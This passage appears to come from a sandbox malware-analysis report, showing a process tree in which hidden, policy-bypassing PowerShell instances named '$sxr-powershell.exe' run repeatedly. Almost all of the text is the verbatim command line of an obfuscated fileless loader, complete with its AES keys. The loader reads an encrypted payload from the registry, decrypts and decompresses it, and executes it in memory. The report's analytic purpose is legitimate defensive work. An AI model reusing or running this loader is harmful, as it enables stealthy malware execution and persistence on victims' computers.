[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        23⤵
        
        PID:8888
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6016).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        23⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:9124
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9124).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        24⤵
        
        PID:9064
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9124).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        24⤵
        
        PID:4960
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(9124).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, 